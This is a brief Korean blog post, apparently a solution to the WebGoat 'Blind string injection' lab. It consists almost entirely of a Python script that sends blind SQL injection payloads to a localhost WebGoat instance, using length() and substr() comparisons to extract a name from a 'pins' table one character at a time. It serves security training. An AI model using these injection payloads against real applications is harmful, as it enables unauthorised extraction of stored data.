Blind string injection

Python/Webgoat

Blind string injection

JAEJUNG 2021. 9. 2. 16:30

import requests

url='http://localhost:8080/WebGoat/attack?Screen=1315528047&menu=1100'
cookie={'JSESSIONID' : '2C39E081510CA8F799595014F02D79A7'} #접속할 때마다 달라짐.

words="101 and length(select name from pins where cc_number='4321432143214321') >"

for i in range(0, 10):
    data= {'account_number': words + str(i), 'SUMBIT':'GO!'}
    res=requests.post(url, data=data, cookies=cookie)
    if 'Account number is valid' in res.text:
        continue
    if 'Invalid' in res.text:
        limit=i
        break
text=''

for i in range(0, limit):
    for j in range(65, 123):
        find_word="101 and substr((select name from pins where cc_number='4321432143214321')," + str(i+1) +", 1) >"
        data={'account_number': find_word + "'" + chr(j) + "'", 'SUBMIT':'GO!'}
        res=requests.post(url, data=data, cookies=cookie)
        if 'Account number' in res.text:
            continue
        if 'Invalid' in res.text:
            text+=chr(j)
            break

저작자표시

'Python > Webgoat' 카테고리의 다른 글

Blind numeric sql injection (0)	2021.09.02

현재글Blind string injection

JWS

Blind string injection

'Python > Webgoat' 카테고리의 다른 글

'Python/Webgoat'의 다른글

티스토리툴바

Blind string injection

'Python > Webgoat' 카테고리의 다른 글

'Python/Webgoat'의 다른글

관련글

티스토리툴바